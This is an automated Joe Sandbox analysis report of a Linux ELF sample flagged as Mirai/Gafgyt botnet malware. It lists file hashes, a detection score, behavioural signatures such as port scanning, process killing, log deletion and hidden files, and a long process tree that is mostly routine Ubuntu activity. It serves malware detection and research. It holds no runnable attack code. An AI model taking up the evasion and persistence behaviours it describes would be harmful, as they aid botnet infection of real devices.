
Linux Analysis Report VAkpLB9NSD

Overview

General Information

Sample Name:VAkpLB9NSD
Analysis ID:553467
MD5:0825b7f6b6e9da31e17fd46e3a10740c
SHA1:7881665597156c61b9861714a3336de2033111f1
SHA256:3501f6be009a942c0511ff6a5b476722881edaf92a08e296310784be1beedee0
Tags:32 elf intel mirai
Infos:

Detection

Gafgyt Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Malicious sample detected (through community Yara rule)
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Sample contains only a LOAD segment without any section mappings
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Sample tries to set the executable flag
Executes commands using a shell command-line interpreter

Classification

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:553467
Start date:15.01.2022
Start time:00:06:03
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 34s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:VAkpLB9NSD
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.evad.lin@0/228@14/0
Warnings:
  • Connection to analysis system has been lost, crash info: Unknown
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.

Process Tree

  • system is lnxubuntu20
  • systemd New Fork (PID: 5190, Parent: 1)
  • logrotate (PID: 5190, Parent: 1, MD5: ff9f6831debb63e53a31ff8057143af6) Arguments: /usr/sbin/logrotate /etc/logrotate.conf
    • gzip (PID: 5231, Parent: 5190, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5232, Parent: 5190, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log "
      • sh New Fork (PID: 5233, Parent: 5232)
      • invoke-rc.d (PID: 5233, Parent: 5232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: invoke-rc.d --quiet cups restart
        • runlevel (PID: 5234, Parent: 5233, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /sbin/runlevel
        • systemctl (PID: 5235, Parent: 5233, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-enabled cups.service
        • ls (PID: 5240, Parent: 5233, MD5: e7793f15c2ff7e747b4bc7079f5cd4f7) Arguments: ls /etc/rc[S2345].d/S[0-9][0-9]cups
        • systemctl (PID: 5241, Parent: 5233, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active cups.service
    • gzip (PID: 5242, Parent: 5190, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5243, Parent: 5190, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
      • sh New Fork (PID: 5244, Parent: 5243)
      • rsyslog-rotate (PID: 5244, Parent: 5243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/lib/rsyslog/rsyslog-rotate
        • systemctl (PID: 5245, Parent: 5244, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl kill -s HUP rsyslog.service
  • systemd New Fork (PID: 5191, Parent: 1)
  • install (PID: 5191, Parent: 1, MD5: 55e2520049dc6a62e8c94732e36cdd54) Arguments: /usr/bin/install -d -o man -g man -m 0755 /var/cache/man
  • systemd New Fork (PID: 5230, Parent: 1)
  • find (PID: 5230, Parent: 1, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: /usr/bin/find /var/cache/man -type f -name *.gz -atime +6 -delete
  • systemd New Fork (PID: 5239, Parent: 1)
  • mandb (PID: 5239, Parent: 1, MD5: 1dda5ea0027ecf1c2db0f5a3de7e6941) Arguments: /usr/bin/mandb --quiet
  • VAkpLB9NSD (PID: 5274, Parent: 5116, MD5: 0825b7f6b6e9da31e17fd46e3a10740c) Arguments: /tmp/VAkpLB9NSD
  • systemd New Fork (PID: 5291, Parent: 1)
  • journalctl (PID: 5291, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5308, Parent: 1)
  • systemd-journald (PID: 5308, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5311, Parent: 1)
  • journalctl (PID: 5311, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5360, Parent: 1)
  • dbus-daemon (PID: 5360, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5373, Parent: 1)
  • whoopsie (PID: 5373, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5375, Parent: 1860)
  • pulseaudio (PID: 5375, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5379, Parent: 1)
  • systemd-logind (PID: 5379, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5439, Parent: 1)
  • rtkit-daemon (PID: 5439, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5443, Parent: 1)
  • polkitd (PID: 5443, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5448, Parent: 1)
  • agetty (PID: 5448, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • gdm3 New Fork (PID: 5449, Parent: 1320)
  • Default (PID: 5449, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5452, Parent: 1)
  • rsyslogd (PID: 5452, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • gdm3 New Fork (PID: 5453, Parent: 1320)
  • Default (PID: 5453, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5454, Parent: 1320)
  • Default (PID: 5454, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5458, Parent: 1)
  • gpu-manager (PID: 5458, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5459, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5460, Parent: 5459)
      • grep (PID: 5460, Parent: 5459, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5461, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5462, Parent: 5461)
      • grep (PID: 5462, Parent: 5461, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5463, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5464, Parent: 5463)
      • grep (PID: 5464, Parent: 5463, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5465, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5466, Parent: 5465)
      • grep (PID: 5466, Parent: 5465, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5467, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5468, Parent: 5467)
      • grep (PID: 5468, Parent: 5467, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5469, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5470, Parent: 5469)
      • grep (PID: 5470, Parent: 5469, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5472, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5473, Parent: 5472)
      • grep (PID: 5473, Parent: 5472, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5474, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5477, Parent: 5474)
      • grep (PID: 5477, Parent: 5474, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5480, Parent: 1)
  • generate-config (PID: 5480, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5496, Parent: 5480, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5497, Parent: 1)
  • gdm-wait-for-drm (PID: 5497, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5502, Parent: 1)
  • gdm3 (PID: 5502, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5507, Parent: 5502)
    • plymouth (PID: 5507, Parent: 5502, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 5525, Parent: 5502)
    • gdm-session-worker (PID: 5525, Parent: 5502, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
      • gdm-wayland-session (PID: 5529, Parent: 5525, MD5: d3def63cf1e83f7fb8a0f13b1744ff7c) Arguments: /usr/lib/gdm3/gdm-wayland-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
        • dbus-daemon (PID: 5531, Parent: 5529, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 3 --session
          • dbus-daemon New Fork (PID: 5533, Parent: 5531)
            • false (PID: 5534, Parent: 5533, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
        • dbus-run-session (PID: 5535, Parent: 5529, MD5: 245f3ef6a268850b33b0225a8753b7f4) Arguments: dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart
          • dbus-daemon (PID: 5536, Parent: 5535, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --nofork --print-address 4 --session
    • gdm3 New Fork (PID: 5537, Parent: 5502)
    • Default (PID: 5537, Parent: 5502, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 5538, Parent: 5502)
    • Default (PID: 5538, Parent: 5502, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5508, Parent: 1)
  • accounts-daemon (PID: 5508, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5518, Parent: 5508, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5519, Parent: 5518, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5520, Parent: 5519, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5521, Parent: 5520)
          • locale (PID: 5521, Parent: 5520, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5522, Parent: 5520)
          • grep (PID: 5522, Parent: 5520, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • fusermount (PID: 5548, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5570, Parent: 1)
  • journalctl (PID: 5570, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5571, Parent: 1)
  • systemd-journald (PID: 5571, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5572, Parent: 1)
  • dbus-daemon (PID: 5572, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5573, Parent: 1)
  • whoopsie (PID: 5573, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5578, Parent: 1)
  • systemd-logind (PID: 5578, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5635, Parent: 1860)
  • pulseaudio (PID: 5635, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5639, Parent: 1)
  • gpu-manager (PID: 5639, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5640, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5642, Parent: 5640)
      • grep (PID: 5642, Parent: 5640, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5644, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5645, Parent: 5644)
      • grep (PID: 5645, Parent: 5644, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5649, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5650, Parent: 5649)
      • grep (PID: 5650, Parent: 5649, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5654, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5655, Parent: 5654)
      • grep (PID: 5655, Parent: 5654, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5657, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5658, Parent: 5657)
      • grep (PID: 5658, Parent: 5657, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5660, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5661, Parent: 5660)
      • grep (PID: 5661, Parent: 5660, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5667, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5668, Parent: 5667)
      • grep (PID: 5668, Parent: 5667, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5672, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5673, Parent: 5672)
      • grep (PID: 5673, Parent: 5672, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5643, Parent: 1)
  • rtkit-daemon (PID: 5643, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5648, Parent: 1)
  • polkitd (PID: 5648, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5656, Parent: 1)
  • journalctl (PID: 5656, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5659, Parent: 1)
  • agetty (PID: 5659, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5664, Parent: 1)
  • rsyslogd (PID: 5664, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5674, Parent: 1)
  • journalctl (PID: 5674, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5675, Parent: 1)
  • systemd-journald (PID: 5675, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5677, Parent: 1)
  • generate-config (PID: 5677, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5678, Parent: 5677, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5680, Parent: 1860)
  • dbus-daemon (PID: 5680, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5683, Parent: 1)
  • gdm-wait-for-drm (PID: 5683, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5684, Parent: 1)
  • whoopsie (PID: 5684, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5686, Parent: 1)
  • dbus-daemon (PID: 5686, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5689, Parent: 1)
  • systemd-logind (PID: 5689, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5749, Parent: 1860)
  • pulseaudio (PID: 5749, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5751, Parent: 1)
  • journalctl (PID: 5751, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5752, Parent: 1)
  • rtkit-daemon (PID: 5752, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5756, Parent: 1)
  • polkitd (PID: 5756, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5762, Parent: 1)
  • agetty (PID: 5762, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5765, Parent: 1)
